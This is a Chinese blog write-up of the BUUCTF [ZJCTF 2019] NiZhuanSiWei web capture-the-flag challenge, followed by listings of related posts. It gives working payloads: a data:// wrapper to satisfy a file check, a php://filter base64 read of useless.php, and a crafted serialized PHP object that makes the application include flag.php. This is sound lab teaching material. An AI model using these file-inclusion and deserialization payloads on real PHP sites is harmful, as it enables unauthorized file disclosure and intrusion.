BUUCTF [ZJCTF 2019]NiZhuanSiWei

已于 2024-04-28 17:07:26 修改
阅读量495 收藏 3
点赞数 6
分类专栏: CTF web题目 文章标签: web安全
于 2024-04-28 17:07:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73399382/article/details/138282620
版权
本文详细描述了解析PHP代码中的三层参数传递过程,涉及数据加密、文件操作和序列化解序列化的技巧,最终找到隐藏的flag.php文件并获取flag。
摘要由CSDN通过智能技术生成

上来就看到如下PHP源码

我就直接丢你们ai解释的了,比我说得清楚

传递三个参数意味着我们需要过三层

第一层text参数需要非空且以读取文件形式读出"welcome to the zjctf"字符串,

我们可以用data://协议将字符串写入文件传给text参数

?text=data://text/plain,welcome to the zjctf

一般传输数据需要进行base64加密,加密后payload为

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

成功显示

第二层:代码中用正则匹配过滤flag,发现变量中含flag就exit停止执行

但是下面代码给我们提示了useless.php文件,文件包含执行

我们用php://filter协议读取该文件内容,payload为:

file=php://filter/read=convert.base64-encode/resource=useless.php

成功读出加密数据

base64解码后得到源码:

上面提示我们flag.php文件,估计flag就在这里面

查看代码后发现参数给变量password前需要进行反序列化,说明原本的数据是序列化后的数据

我们只需添加两行代码即可得到序列化后数据O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}(别忘了赋值给$file!)

最终payload:

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

显示成功,在源码(ctrl+U和鼠标右键都可查看)中发现flag

孤丞OVO
关注
专栏目录
BUUCTF-[ZJCTF 2019]NiZhuanSiWei
lunan的博客
05-15 405
BUUCTF-[ZJCTF 2019]NiZhuanSiWei 一、知识点 1、php各种协议,data://,php:// payload构造: text=data://text/plain,welcome to the zjctf data协议解释:https://www.php.net/manual/zh/wrappers.data.php 2、文件包含 payload构造: file=php://filter/read=convert.base64-encode/resource=useless.
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2836
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
每天一道ctf
whisper921的博客
11-13 926
构造:data://text/plain,welcome to the zjctf,为了绕过某些过滤,这里用到base64编码。然后有一个可控参数file,构造file=useless.php,但是针对php文件我们需要进行base64编码,否则读取不到其内容,所以构造payload:file=php://filter/read=convert.base64-encode/resource=useless.php。结果为:O:4:"Flag":1:{s:4:"file";
BUUCTF [ZJCTF 2019]NiZhuanSiWei 1解题思路
MyZy_的博客
11-10 290
BUUCTF [ZJCTF 2019]NiZhuanSiWei 1解题思路。
BUUCTF [ZJCTF 2019]NiZhuanSiWei1
biggerpig的博客
09-25 1024
BUUCTF web类型题目[ZJCTF 2019]NiZhuanSiWei1详解
web | CTFBUUCTF [ZJCTF 2019]NiZhuanSiWei
weixin_46301214的博客
09-30 234
利用:是php中独有的一个协议,可以作为一个中间过滤器来处理目标数据流,可以进行任意文件的读取,且该协议的参数会在该协议路径上进行传递,多个参数都可以在一个路径上传递,相当于可构造多个过滤器。通俗一点讲就是,php://input作为被包含的参数时,也是文件包含,不过是包含的对象是post的数据,而post的数据为用户所传入,所以也相当于任意命令执行。直接 file=flag.php ,然后echo一下实例化的类,就完事了(忘记了上去看一下一开始的源码)有不一样的效果,有的是在注释,有的是直接显示到页面。
BUUCTF[ZJCTF 2019]NiZhuanSiWei
weixin_45253622的博客
05-16 252
打开题目发现是代码审计,源码如下: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //text不为空,且file_get_contents读取的返回值为‘welcome to the zjctf
buuctf——[ZJCTF 2019]NiZhuanSiWei
m_de_g的博客
04-16 534
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。把整个文件读入一个字符串中。进行抓包传输,开始还一直以为是。方法二需要注意的是,需要使用。的问题,踩了一堆的坑。
BUUCTF:[ZJCTF 2019]NiZhuanSiWei 1
Zero_Adam的博客
02-07 261
BUUCTF:[ZJCTF 2019]NiZhuanSiWei 1 水文,给自己做点记录 这个简单,但是我没做出来,,辣鸡! 就是一个简单的伪协议的应用, 源码自己去看 没有做出来的原因 想PHP伪协议,没有想全 对文件包含不够敏感 就做到这一步,主要是useless.php我没用到啊,里面的flag在什么变量里面我也不知道,里面有什么类我也不清楚。。。 不行,看WP了,, --------------------------------------------------分割线-----------
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3555
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
weixin_45441024的博客
12-27 689
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门 一般的堆题都是这种表单形式的
信息与网络安全需要大数据安全分析
2401_88751384的博客
11-18 268
与此同时,随着安全防御的纵深化,安全监测的内容不断细化,除了传统的攻击监测,还出现了合规监测、应用监测、用户行为监测、性能检测、事务监测,等等,这些都意味着要监测和分析比以往更多的数据。一方面,企业和组织安全体系架构的日趋复杂,各种类型的安全数据越来越多,传统的分析能力明显力不从心;借助大数据安全分析技术,能够更好地解决天量安全要素信息的采集、存储的问题,借助基于大数据分析技术的机器学习和数据挖据算法,能够更加智能地洞悉信息与网络安全的态势,更加主动、弹性地去应对新型复杂的威胁和未知多变的风险。
网络安全最新XSS漏洞
anquan2233的博客
11-18 211
​ 目前CS出现XSS漏洞的原因主要是因为CS的客户端可以被HTML渲染,目前已知存在位置为计算机名,username等,因为再前面我们可以自定义上线,所以更改一下这些地方的信息不是难事。首先生成一个裸奔马,然后在被控端打开wireshark并且点击exe上线,我们这里只考虑应用层的包,所以过滤一下,我这里得到4个包。加密函数最多加密117字节,所以会报错,然后我简单的改了下脚本,如下图所示需要自己对照改。到这里就可以利用脚本来达到批量上线的目的了,这里可以利用师傅现成的脚本达到上线的目的。
一些常见网络安全术语
最新发布
Hacker_xingchen的博客
11-18 618
(2)  蜜罐好比是情报收集系统,蜜罐好像是故意让人攻击的目标,引诱黑客前来攻击,所以攻击者如前后,就可以知道攻击方如何得逞的,随时了解对服务器发动的最新攻击和漏洞,还可以通过窃听黑客之间的联系,手机黑客所用的种种工具,并且掌握他们的社交网络。在计算机科学中,社会工程学指的是通过与其他人的合法地交流,来使其心理受到影响,做出某些动作或者透露一些机密信息的方式,这通常被认为是一种欺诈他人以收集信息/行骗和入侵计算机系统的行为,在英美普通法系中,这一行为一般是被认为侵权隐私权的!这是一顶黑帽子的反面。
[ 网络安全介绍 3 ] 网络安全事件相关案例有哪些?
qq_51577576的博客
11-14 1045
[ 网络安全介绍 3 ] 网络安全事件相关案例有哪些?
【热门主题】000055 网络安全:构筑数字时代的坚固防线
宝码香车的博客
11-18 848
网络安全对于防止金融损失也具有重要意义。网络攻击者可能会窃取银行账户信息、信用卡信息或进行勒索,导致金融损失。这种损失可能对个人和企业造成严重的财务影响。素材中提到,警惕网络安全,防范金融诈骗,消费者应保护好个人信息以免掉入金融诈骗陷阱。岁末年初,各类金融诈骗多发,网络金融诈骗花样繁多,让消费者防不胜防。我们应提高网络安全意识,保护好个人金融信息,防止金融损失。
密码学在网络安全中的应用
QQ_778132974的博客
11-10 938
在实际应用中,如SSL/TLS协议就使用了密码学技术来保护Web通信的安全,确保数据在传输过程中不被窃取或篡改。哈希函数将任意长度的数据映射为固定长度的哈希值,且任何微小的输入变化都会导致哈希值的巨大变化。四、其他应用密钥管理:密码学技术还用于密钥的生成、分发、更新和销毁等管理过程,确保密钥的安全性和可用性。安全协议:如IPSec协议等,这些协议使用密码学技术来保护网络层通信的安全,防止数据在传输过程中被窃取或篡改。它不仅保护了数据的机密性、完整性和可用性,还确保了网络通信的安全性和身份的真实性。
C++ PWN题解析:ZJCTF 2019 Login漏洞利用
"BUUCTF-PWN-[ZJCTF 2019]Login 是一个关于网络安全竞赛中的Pwn(破解)类题目,主要涉及到C++编程、汇编语言分析以及栈溢出漏洞的利用。" 该题目描述了一个登录系统,参赛者需要通过输入正确的账号和密码来访问...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值